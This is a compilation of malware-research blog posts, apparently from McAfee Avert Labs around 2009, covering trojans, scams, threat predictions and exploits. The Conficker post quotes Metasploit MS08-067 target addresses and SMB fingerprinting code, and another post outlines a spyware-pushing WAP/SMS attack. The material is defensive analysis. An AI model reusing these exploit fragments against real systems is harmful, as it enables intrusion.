Here’s another twist in regionally targeted attacks: A new Trojan (pretending to be a toolbar installer) is spreading that bundles the legitimate toolbar for the German social network “StudiVZ” with a variant of Backdoor-CEP. Among other malicious activities, the backdoor is capable of recording a user’s screen, taking screenshots, and logging keyboard strokes. At first glance, the deliberately modified installer looks perfectly harmless, especially because it refuses to do anything malicious if it detects certain security products or if it thinks it’s being observed through a sandbox or a debugger.

Behind the curtain, however, a lot of non-kosher things happen. The installer injects parts of the bundled malicious code into running processes or starts a legitimate process in suspended state, and then unmaps its content and remaps different, malicious content to the process before resuming it again. The malicious code is hard to detect because it is decrypted and injected into memory and never written to disk.

After the toolbar’s installer has finished, it automatically runs an instance of Internet Explorer to open http://studivz.net, which is the social network’s login site. With the newly installed toolbar clearly visible now through additional controls and logos on top, the user’s next step will most probably be to log into the social networking site.

At this point the backdoor has already infected a number of running processes in memory and installed a callback to capture and save any keystrokes.

The author of this variant of Backdoor-CEP seems to be particularly interested in the credentials of StudiVZ; the Trojan also makes periodic connection attempts to a host located in Germany. Fortunately for McAfee customers, the malicious installer is blocked by Artemis and is blocked at the (former Secure Computing) Web Gateway.

Following our warning, last week, of the possible scams related to the approaching Valentine’s Day, it’s no surprise that today we’ve seen another new Valentine theme come up–hosted on the fast-fluxing Waledac botnet. If a user were to follow the link in these spam emails–and please don’t do that!–a web site like the following would appear:

A picture with two adorable Shih Tzu puppies is wishing a Happy Valentine’s Day. The text of the lure is advertizing a “Valentine Devkit” named loveexe.exe or start.exe. And regular readers can guess it already: This is a social-engineering trick to convince users to download the real threat. Don’t click the link to the executable or you will end up with malware.

A close look into the website’s source code doesn’t currently reveal any additional drive-by infections nor downloads (but that can change quickly), as seen in past Waledac (or “Storm”) themes. Coverage of this particular malware variant is in the 5522 DATs, plus blocked by Artemis, plus blocked at the (former Secure) Web Gateway as well.

As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

Our Main Threat Predictions/Trends for 2009:

• Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

• Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

• Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

• Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

• Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

• More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

• Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

• Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

• An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

• More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

• Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

• McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

• New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

Since at least the year 2000, email scams have circulated around the net for the selling of International Driver Licenses. The authors explained that with their documents buyers could avoid having to pay traffic tickets as well as allowing them to establish new identities for hotel check-ins or bar entrance (if the buyers are underage). Lately these offers have put on weight.

Yesterday, I came across such an ad; it was in French and promoted a site offering a replacement driver license in place of a regular one:

Due to its name of (backdoordl), the website aroused my curiosity. I followed the link and, one thing leading to another, I discovered the extent of this fraud.

At backdoordl, I found a professional website divided into three areas: French, German and English.

In the UK area, I recognized text that was similar to what I first saw in French:

Have you lost your existing licence? No problem! Can’t remember the details? No problem! Need a clean licence? No problem! Need motorcycle, car, bus, hgv entitlement? No problem! Over 65? No problem! Medical problems? No problem!

There are 110 models of drivers licences in current use throughout the European Union, that’s not to mention drivers licences issued outside of the EU that are still accepted for exchange in different EU countries. This service is directed at any resident or non-resident of the United Kingdom or EU that wishes to obtain a full driving licence without any tests. So no matter what country you are a resident or citizen of, they claim they can help. Even if you live outside of the UK or EU! Once you have a driving licence through them, you can exchange it in your own country for a local licence. EU driving licences are accepted ‘as is’ worldwide for driving and exchange. It does not matter what nationality you are!

The office address, undoubtedly fake, written into the contact page was in the UK. There was no phone number; they said it would be provided only to clients who ordered. Despite some inconsistencies here and there, it was also explained the company did not accept any postal contact.  Because photo and signature were needed to create the new driving license, they had to be scanned by the buyer and then sent via email.

The registrar was ENOM Inc. and registration details protected via “WhoisGuard” service thus masking the true identity of the domain-name registrant and preventing public access to that information through its (and any) WHOIS database.

Getting on with my searches, I discovered the backdoordl site was not unique. Almost half a dozen nearly exact copies were also easily available online:

Domain registrants’ WHOIS information is also hidden or made with seemingly bogus data.

At backdoordl and its clones, prices seem consistent: £359 GBP or 399 Euros with payment encouraged via Western Union. There are two ways to obtain the documents:

First way is to exchange your current driving licence, you complete our application form and we print it out and translate some of your driving licence and translate the application form, put it all together and apply for an EU licence. This is a way to obtain driving categories that you select on the application form as the foreign issuing authority will look at the translation and not the licence.
The second way is to make a declaration that your licence has been lost/mislaid/stolen in a certain country that we know about. No other proof that you have even passed a test is required, just your sworn declaration. They will issue you with a temporary driving licence which we can then get translated and exchanged for an EU licence. SNEAKY? Yes, but Illegal? We have been advised NO.

Announced license process is said to take approximately 21 days.

I also discovered this language localization was not unique. During further searches, I found the AldaLegal offer and its clone, DLtransfer. Here too, these crocks speak your language. Sites are not only available in French, German, English, but also in Spanish and Chinese.

Here, the offer is better rounded and not limited to European Community:

For both sites, the company address written at the contact bottom pages is the same: in Australia (215 Harris St., Sydney NSW 2009). Using Google I got hold of a Word document at the bottom of a directory path: a standard letter perhaps used by the guy behind this rip-off. It would appear they also offer help for illegal immigration.

Finally, two other sites attracted me: eudriverlicence and licencetoday. Here too, the seller expresses himself without restraint:

They clearly explain the two ways to obtain such a license. As before, with the first one the buyer has to provide partial information of his actual license. As result, crocks promise an EU Driver License coming from one of the following countries: Cyprus, Czech Republic, Estonia, Hungary, Latvia, Lithuania, Malta, Poland, and Slovenia. The price is around 400 Euros.

With the second way, for applicants who do not or cannot submit any license details (only scanned photo and signature via email), the sites explain they can apply outside the European Union (Africa or a South American country):

All you need to do is check box A “Outside the E.U. Temporary Drivers Licence” on the application form and by ticking the box you declare you have had your licence lost/mislaid/stolen. Then by submitting the application along with further forms, which we submit, we can then obtain a temporary driving licence.

Here a 100 Euros extra-service cost is applied. In this case the total cost becomes 500 Euros.

These sites are not fully duplicated, but the texts look very similar. One company is Martin and Benn Associates. Its address is said to be in Gibraltar (Victoria House, 26 Main St.). The other is said to be in Germany.

At fraudwatchers, a contributor in Gibraltar went down to the alleged offices of Martin and Benn Associates. He didn’t find it, neither in the building, nor in the Gibraltar telephone book. To prove this, he provided the following picture:

The risks are numerous in a story like this. The first one: You are not assured to receive this document. For sure, your bank account will be debited, but getting the license in return is less certain. And fear the worst for your personal data (plus your photo, plus your signature) that you will send to these guys. This information would be perfect for making forged papers.

Depending on regional laws, it may or may not be legal for these companies to produce such documents and to sell them to you, but it may not be legal for you to carry them, or to use them as a driving license. At the drivers.com website, they provide the truth:

• An International Driving Permit is merely a translation of your regular driver’s license into almost a dozen languages.
• It is not a driver’s license by itself.
• You must still carry a valid, regular license from your country, even if you are also carrying an IDP.
• Yes, the United Nations created a treaty, now signed by about 150 countries, but the IDP is not a license by itself. It is mainly to help police read licenses written in other languages.
• You must purchase an IDP in your country of residence.
• You must have a legal license from your country of residence in order to get an IDP.
• No, you cannot use the IDP as a “license” inside your country of residence.
• No, you do not get a new, separate driving record with an IDP. They cannot be used to hide violations or tickets: These are still recorded on your regular driver’s license.
• Most countries authorize only certain organizations to sell IDPs. Check with your local government driver’s license authority.
• In the USA, only two organizations are allowed to sell real, legal IDPs: the American Automobile Association (enter your location carefully), and the American Automobile Touring Alliance, which offers IDPs through the National Automobile Club.
• In Canada, the only authorized distributor of legal IDPs is the CAA. Canadian IDPs are not valid in the USA.
• In the USA and Canada, the cost of a real IDP is about $10.

Being French, only one question left for me as I ended this post: Why do all these guys write “licence” with two “c’s”? I found the response in my dictionary: In the UK, “licence” is the noun and “license” is the verb. In American English, however, the noun is also spelled license. Another lead for the police :-).

Malware continues to increase at a rapid rate. With the DAT-5516 release, scheduled for 4 February, the number of drivers in the DATs will pass 500,000. Half a million is a huge amount. I remember my first antivirus program, back in the ’80s, that had a count of about 80. I don’t recall the exact number, but it’s easy to place it into perspective. We add way more on a daily basis now.

However, our current count is not an absolute number of detected malware files; this can confuse many people. Drivers can be written very specifically, say one driver for one sample, but that’s not very effective. Most drivers are written to generically detect many samples. For example, one driver can detect 50 or as many as thousands of malware files. Therefore, the number of detected malware files is way higher then the half-million number reflected in the DATs. For another look at the complexity of counting malware detections, please see François Paget’s blog as well.

Initially VirusScan would focus just on true self-replicating viruses, mainly 8-bit (.com/.exe), MS-DOS viruses as well as boot viruses, which were prevalent then–and some still are today. Malware has evolved into many areas including, but not limited to, VBA, VBScript, JavaScript, 32-bit (pe-type .exe binaries) mass-mailers, 32-bit file infectors, mobile malware, adware and password stealers, and others. Nowadays the majority of malware is static Trojans.

There has also been a big shift by the malware authors. The first malware authors were hobbyists, writing to to prove it could be done, but today we mainly see malware that’s going after the money–password stealers, etc. Malware is often developed in professional environments, much like a business project with a plan.

Although there is malware for operating systems such as Mac OSX and the various Linux/Unix versions, most malware is still targeted at Microsoft Windows and its applications.

China’s use of zombies for spam is down, but the country now leads the United States in McAfee’s February Spam Report, available here for download.

The United States has long been the leading supplier of spam, but with the overall amount of spam decreasing, China is catching up. It’s not clear what China is doing, but the vast amount of computers that have been controlled by zombies are no longer being used for that purpose. One certainly has to wonder what they are being used for.

Additionally, in Switzerland (owner of the .ch domain), we have seen a big increase in the amount of spam offering “cheap” software.

Clearly, money and profit are still the driving forces for malware and spam these days.

Recently I bought a new cell phone: the HTC Touch Pro. Great mobile phone. Opera Mobile Web surfing is handled great. The Sprint EV-DO Rev A network is fast and it’s the most stable smart phone I’ve had so far. As a security researcher naturally I had to dig deeper into how secure this mobile phone actually is. I quickly found out things that make me wonder if the mobile handset industry has learned anything from the desktop industry as far as protecting consumers.

The first thing I did was look at the default security settings of the mobile phone. Microsoft mobile keeps the policies in the registry under HKLM\Security\Policies\Policies. These policies are also documented at http://msdn.microsoft.com/en-us/library/ms890461.aspx along with the recommended settings to use as a security baseline at http://msdn.microsoft.com/en-us/library/ms889564.aspx. The first thing I noticed is that some policy settings on my phone are, by default, different from the recommended settings. Below is the analysis on two of these changed policy settings:

SL Message Policy
Recommended Default: 2048 - SECROLE_PPG_TRUSTED
Value on HTC Touch Pro: 0000100c: 2112
Changed Value: (SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

SI Message Policy
Recommended Default: 3072 - (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED)
Value on HTC Touch Pro: 0000100d: 3136
Changed Value: (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

These policy settings define WAP Push SI (Service Indication) and SL (Service Load). WAP was designed to be used by operators, administrators, and others to push software updates or even ringtones directly to the phone. For some unknown reason the HTC Touch Pro has broken from the recommended security policy and added a flag (SECROLE_USER_UNAUTH) that allows unauthenticated WAP Pushes from anyone. What does this mean? It means that an attacker can send a WAP push telling you to install spyware, like FlexiSpy, which gives them full control of your mobile handset. Once installed, the attacker can obtain your private data, your passwords, call logs, and even eavesdrop using the microphone. Sound familiar? And don’t think that it has to be a WAP push with a WAP gateway etc. That’s not the only impact these settings have. A specially crafted SMS can have the same effect as sending the WAP push through a gateway. A binary SMS message can contain a WAP SL Push (using SL as it can be used to force the downloading of spyware without user intervention or prompts) that instructs the mobile handset to go to a specific URL, get the spyware, and run the spyware after receiving it. In this case, all the attacker would need is the mobile handset phone number to send the binary SMS message to.

Further research showed that binary SMS doesn’t seem to work on Sprint’s CDMA network. Although, it is reported it does work on GSM networks such as AT&T. This makes me wonder what the default security policy is for WAP Pushes on AT&T’s version of the HTC Pro Touch, the HTC FUZE. In any case, unless you know you absolutely need this flag, set these security policies to the Microsoft recommended default value of 2048 and 3072 respectively. I use PHM Registry Editor although any registry editor for Windows Mobile can be used.

Shortcuts, or LNK files, are small binary files which have the path to an applications, sometimes with optional parameters. These files are used for running applications and are placed on folders where they are easy to access by users on such places as Desktops, and Application Launchers. The LNK files are also placed within the Startup folder to run automatically upon system boot. This indirect way of running applications is often attractive to malware authors as shortcuts have not been called out to most user’s attention for the sake of security as much as executable files have. At Avert Labs, we have recently seen some malware abusing shortcut files to launch malicious files/scripts in several different ways. Here, we introduce some methods we have recently seen:

1. Create shortcut files linking to malware files

This is an easy way to launch malware by a user’s actions or upon system reboot. These LNK files are created on the desktop, network shares, and even startup folders. One of the many variants of the Spy-Agent.bw trojan are known to take advantage of shortcuts to run.

2. Parasitic Infection to shortcuts

We have seen the W32/Mokaksu virus modify all LNK files on the desktop and add the path of the malware file to the original path.



The example above is the shortcut to Adobe Acrobat Reader infected with malware. The path to the malicious “Config.Msi.exe” (in the red box) is added before the original path “AcroRd32.exe” (in the yellow box). In the shortcut, the original path is treated as a parameter to the malware file. Upon clicking on the shortcut, the W32/Mokaksu malware runs as well as executing the original file, all while running in the background. Ultimately users only see the application which was associated with the shortcut launch, thereby making it much harder for users to notice the infection.

3. Scripts in the shortcuts

Shortcuts can often contain scripts for “cmd.exe” instead of linking to executable trojan files. The Downloader-BMF trojan is such a case.



When users click on these LNK files, the scripts silently creates and drops ftp scripts to then download vbs scripts from the ftp severs. The downloaded vbs scripts are then responsible for downloading trojan files.

In the first 2 cases, shortcuts are just ways of launching malware whereas in the last case, these LNK files are standalone malicious files in which no other malicious executable files are needed but a legit “cmd.exe”. This type of LNK files can be attached to emails or hosted on the web sites. This implies that we need to be more careful with LNK files. Users can easily check shortcuts by browsing the file property or viewing the file with a binary editor.

If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.

It’s been a week since we’ve seen the new Mac malware, the iWork09 Trojan, which is disguised as pirated software. Since then there have been several reports about new Mac Trojans.

Before this we saw mostly lame malware for Mac OSX, but the iWork09 Trojan represents a new element to Mac Trojans — sophistication. This one contains peer to peer-like characteristics and even encrypts its traffic. It has also been associated with some recent distributed denial-of-service attacks.

One thing to remember when dealing with pirated software is that you might have a high price to pay, in this case ending up a Trojan that turns your computer into a zombie. We have seen this happen for years with Microsoft products and even with AV products. (If you search for “McAfee” on torrents sites, you will find a lot with serial numbers; but you won’t know whether the thing is a Trojan version.) Now this unfortunate trend has arrived on the Mac platform, with several reports of Trojan versions of pirated Mac applications.

Take care — you often get what you pay for.

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Fake alert malware prey on innocent victims by displaying misleading scan alerts. They trick the user into buying fake antivirus, to fix such falsely exaggerated scan reports. This class of “scareware” software depends on extreme social engineering tactics and comes bundled with Backdoors, Password Stealers, Downloaders, Droppers, Browser Helper Objects, etc.

Each of the above class of malware are used either in the distribution of the fake antivirus itself or in the propogation of other kinds of malware once the fake antivirus is installed on the victim’s machine. Working towards a common goal - extorting money from an innocent victim - these scareware applications have added a new class of malware to their armory - rootkits.

Apart from hiding the scareware’s files, rootkits ensure that access to genuine security vendors’ sites is disabled. The rootkit we noticed, named “tdss[random characters].sys” was blogged about by Computer Associates recently and was associated with the AntiSpywareXP2009 scareware. We, however, noticed that this rootkit was protecting rogue components belonging to WinWebSecurity scareware. This implies that:

1. The same author of the rootkit is supplying his code to multiple scareware vendors for money, or
2. The same group is creating and distributing multiple fake antivirus.

McAfee AV, will detect & clean this rootkit component from DAT version 5496 onwards. However, a user stuck with a machine that does not have antivirus with updated signatures, will have to clean this rootkit manually.

If you are a Windows user, apart from the usual safe computing practices that include using a firewall, an updated Windows operating system and an antivirus software, consider the following steps to minimize the chances of getting infected by such scareware:

1. Install a backup software, which can revert your system to a previous known uninfected state
2. Browse the Internet from sandbox software
3. Install and browse the Internet from a Virtual Machine

On a final note, the Federal Trade Commission has recently won a restraining order against Innovative Marketing and ByteHosting Internet Services - companies responsible for marketing the scareware applications WinFixer, WinAntivirus, DriveCleaner, ErrorSafe and XP Antivirus. However, we will have to wait to see if this move actually has any impact on curbing the distribution of scareware.

In less than four days the inauguration of President-Elect Barack Obama will make headlines. At McAfee, we expect cybercriminals to use this event to conduct their typical attacks like they do when the news gives them such opportunity.

Unfortunately, we were right and some sites have already started to circulate fake information on this subject to lure in the crowds in an attempt to infect their computers. Here is one of them we recently discovered. As you can see for yourself this author does not hesitate to make use of sensationalism:

Let me add that if you are lured into this trap and are using an incorrectly protected PC that you will be infected by malware we detect as W32/Waledac.gen.b.

This website was not created by a joker. It is very professionally done. It is protected by a botnet bringing into play the fast-flux technique I have explained here and here.

Once again, be vigilant and do not unwisely follow a link you may have received via email or find upon a search!

Recently we got some new samples of the W32/Conficker.Worm to analyze. While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself. Below is the traffic packet capture snapshot sent by the worm:

As we can see from the image above, there are some random alphanumeric characters in the packet which seem to have been generated from Rex::Text.rand_text_alpha in ms08_067_netapi.rb. And if we do a byte order conversion of data in red box above, we get 3 addresses: 0×00020408, 0×6f8917c2, 0×6f88f807, which are the internal targets of the ms08_067_netapi.rb exploit as listed below (from metasploit):

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
	{

                     'Ret'       => 0x6f88f807,
                     'DisableNX' => 0x6f8917c2,
                     'Scratch'   => 0x00020408
	}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

The latest metasploit exploit, besides including Windows XP/2003 OS’s; also includes several targets for languages such as English, Arabic, Czech, Danish, German, Greek Spanish Finnish, French, Hebrew, Japanese, Chinese, etc. The exploit module of ms08_067_netapi in metasploit also provides the “smb_fingerprint()” function to detect the Windows version information, Service Pack information and also the language information of the target OS. This makes programming the worm much easier and can cause much bigger impact. By using the exploit from the metasploit module as the code base, a virus/worm programmer only needs to implement functions for automatic downloading and spreading. We believe that this can be accomplished by an average programmer who understands the basics of exploitation and has decent programming skills. After further analysis of the traffic capture, we found that only the functions for detecting OS version and Service Pack information were embedded into this worm. Hence without the remote OS language determination ‘feature’, this worm only targets the English OS versions at the time of writing the blog.

Here is a packet capture snippet used in this malware to detect the OS version and Service Pack information:

By sending SMB session setup and request, it can detect OS information of target machine. If the OS is Windows Server 2003, then the Service Pack information will also be returned.

Since there are a huge number of Windows XP systems it’s obvious that the worm writer did not want to miss out on this pool, hence this is why the worm determines what the Service Pack level is by accessing \SRVSVC named pipe, which is similar to the method used in metasploit smb_fingerprint() function :

if (os == 'Windows XP' and sp.length == 0)
            # SRVSVC was blocked in SP2
            begin
                         smb_create("\\SRVSVC")
                         sp = 'Service Pack 0 / 1'
            rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
                         if (e.error_code == 0xc0000022)
                                 sp = 'Service Pack 2+'
                         end
            end
end

So in this instance it’s obvious that malware/worm writers are abusing open source tools to their advantage to make their work easier.

For those who haven’t patched their machines, we suggest you install the MS08-067 patch ASAP! If you are a McAfee Host IPS or Network IPS user, we’ve verified that you are protected against this worm by our Signatures ID’s 3961 and 0×40709d00 respectively. For VirusScan users, the DAT update version 5444 has coverage to detect this worm.

Today we at McAfee Avert Labs released the first of our new monthly publications: the “McAfee January Spam Report.”

Within its pages you will find excellent information on current spam trends, campaigns, and maybe even some “winners and losers.” Some of the highlights of the January issue include:

Political Spam
Tax Relief Junk Mail
Unemployment and Diploma Spam Increases
Christmas E-Cards

As well as some 2009 spam predictions! Definitely worth the download and read. Watch for our February issue in about four weeks. All spam reports, as well as other white papers, are available from our whitepaper download area here.

LinkedIn is a popular social networking site where you can manage business contacts online. Since you can set up a profile with links to your own website, it seems to attract criminals’ attention as well. A Google search reveals that several hundred fake LinkedIn profiles from nude “Kirsten Dunst” to nude “Hulk Hogan” exist already. The rogue profiles look all alike, with a picture of the celebrity and three links to the parts of the “nude video” like shown in the following picture.

This is exactly the lure - don’t follow these links! The linked websites contain obfuscated script code which decodes to a simple browser redirection. This obfuscated script code is proactively detected by McAfee as “Exploit-IFrame.gen.c” already.

If you’d follow the link (don’t do that!) to see how deep the rabbit hole goes, you will end up with a Traffic Management System like described in this Avert Labs blog entry. On every reload the server-side application will point to a different domain.

So when an unsuspecting user gets tricked to follow the lure, he will end up on different malicious websites trying the classical social-engineering tricks of either the “missing video codec” or of showing a fake AV scan and telling that the user his computer was infected with malware and offering a “free” AV scanner software, which in fact is the real threat. So beware when following links, even on trusted Web 2.0 platforms like LinkedIn. Especially when they promise some nude celebrity videos.

The current crisis in Gaza between Palestinians and Israelis marks a renewal of web defacement activities. Various Morocco hacker groups have been pointed out by the press; the best known is “Team-Evil,” which just hacked the Ynet Israeli news site.

This weekend, I read various French posts speaking about ethical hacking and “e-jihad” operations made by “pacifist hackers” motivated only by their political ideology. However, reality is sometimes different from perception, and one hacker may conceal another.

On New Year’s Day various web sites were hacked by people introducing themselves as “Morocco & Gaza Hackers” or the “Team Cruel Boys” group.

On the defaced page, one attacker–whose email address is m0×0m_at_hotmail.fr–introduced himself as “M. SoOoSo.” His message seems clear: “I’m not a saboteur, and I didn’t hack this site as an act of sabotage.” At first glance, this guy could gain some sympathizers of the Palestinians’ cause.

But the story is not so simple. A week before, on Christmas Day, I heard about a phishing attack against Orange.fr, a French Internet Provider. Using a mirror site, hackers tried to intercept user names and passwords to access emails and personal data.

Speaking with the discoverers of this identity theft attempt and looking at the code, I noted the stolen data were sent to the same m0×0m email address. Moreover, the PHP script was named soooso.php. What a curious coincidence!

A second email address pointed to another possible Moroccan. As result of some searches I made today, I would not be surprised if this second guy (if it is not the same as the first) was also involved in some fake auction operations.

Of course I can prove nothing, but it would not be the first time we have heard hackers claiming to be ethical “white hats” who are really engaged in criminal activities.

The Web’s classical social-engineering trick of the “missing video codec” tries to lure people into clicking on links or download and install an executable which pretends to be the missing application which is needed in order to watch the movie. The animated picture below is such an example: at first glance, it looks like a typically embedded video which is unable to load. The “picture” states that you’d have to click on it in order to see the movie. And here the lure begins - in this blog entry, we’ll follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. As a quick analysis reveals, the Flash is compressed and additionally contains some obfuscated JavaScript code to hide its real intention. The script code redirects to another location.

The new location points to a so-called “Traffic Management System”. In this case, if you load the URL several times, the destination rotates and after too many retries you will be always redirected to the homepage of Google. The system remembers your IP address on the server-side for a certain time period. After that time, or when you just use another IP address, you will again see the redirections when visiting the URL.

The redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Another example, which also used Geo-Location, was outlined in this Avert Labs Blog post where a downloader trojan contacted such a system and based on the country, different malware binaries were downloaded.

Such traffic management systems nowadays are configured via web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default where “three” or “default” stands for different campaign IDs inside the system. A typical rule could look like shown in the following picture.

The administrator is able to define rules for “incoming traffic” which results in different “outgoing traffic” based on different restrictions. For example, the Geo-Location could be used to redirect visitors from a particular country to one location while visitors from another country will be redirected to a different location - just think of localized campaigns targeted to the spoken language in these countries. So users from the United States will not be redirected to a french phishing web site and vice versa.

These traffic management systems can also use more complex rules based on network ranges and the referrer - so lets say that only visitors with a referer from Google will be redirected to a malicious web site as long as the IP address of the visitor doesn’t come from well-known network ranges belonging to security companies.

Why do that? This way, only users searching for the website will get to the malicious redirect, while the websites’ owner or administrator, who usually does not search for it but directly enters the URL into the browser, will see the normal website with no oddities. This helps the attacker to keep the infection under the radar for a longer time.

Other trafic management systems, like shown in the above picture, also feature different logins into the web interface - for the administrator, the “sellers” and the “buyers”. This particular system has different views for sellers of traffic - that is, infected web sites containing an IFRAME that points to the trafic management system -, and buyers of traffic - e.g. the people who run exploit servers and try to install malware on unpatched computers, thus looking for potential victims. Such traffic management systems can be in between the infected web sites and the exploit servers. As you can see in the above picture also payment options can be configured, so the more traffic a seller redirects to a buyer, the more money is paid. With such systems in between, the campaigns can be easily exchanged or the “traffic” can be sold to new buyers which try to install their malware.

So the classical starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious ressource nowadays means that you are redirected based on a complex server-side management system.

Today a new downloader trojan is being spammed widely. This spam message arrives as a reply to the victim’s query of asking for the wire transfer.

When users run the file “bank_statement.scr” in the attachment zip file, it downloads the BackDoor-DSG trojan, while in the background it downloads an innocent pdf document from a legit site and opens it for deception. The pdf document, however, is not relevant to the wire transfer.

We see that the trojan file is repacked for each message, thus none of them are identical. In addition to that, this time the malware authors are changing resource sections in those pe files such as Icons, and file properties.

For example, we observed following icons:

Other resources:

File Descrption:

• Auto-reader Module
• Reader_Module
• Adobe Reader HSMC
• Adodb_SSL_reader

Translation:

• English
• Spanish
• Korean

CompanyName:

• Adobe
• ADOBE

These crafted resources, as well as the malicious code, are the result of server-side polymorphism to attempt to evade detections by Anti-Virus software. McAfee Avert Labs detects the current wave of the downloader as BackDoor-DSG.dldr trojan, and dropped files as BackDoor-DSG with DAT 5474 or later.

From fake online banking to regionally targeted celeb porn - that’s just two days in the life of a “FormSpy” (a.k.a. “Infostealer”) malware campaign. In the past few days a spam run started to promote a fake “Bank of America” web site, announcing a change of the online banking’s interface to its “customers.” For these “customers” to be able to have a quick look at the “demo” page, a preview link is provided as shown in the sample spam mail:

Innocent users that follow the lure by clicking the link are presented a fake banking web site which uses the well known missing-codec-trick that is used to convince users into downloading an additional component for a website or video to work. This time it is an apparent update for “Adobe Flash Player” which they require you to install for their “demo page” to work. The update of course isn’t any legit software but a trojan instead.

We have taken a concise look under the trojan’s hood - it not only installs a rootkit but also collects private information from the infected computers. This information is leaked to a server using HTTP POST requests and in the end may either be sold or used to spread the attacking party’s malware further.

The embedded rootkit is written to harddisk once the trojan is executed - the rootkit driver’s Portable Executable header can be seen in the screenshot below.

Among this private information are POP3, IMAP and FTP server credentials but also credentials for the popular “ICQ” instant messenger. See below for a screenshot of the malware’s pseudocode:

The trojan moreover is capable of receiving and executing commands from the malicious host that it phones home to, so the malware’s behavior may change and “improve” anytime.

The list of commands currently understood by this variant of the trojan is as follows:

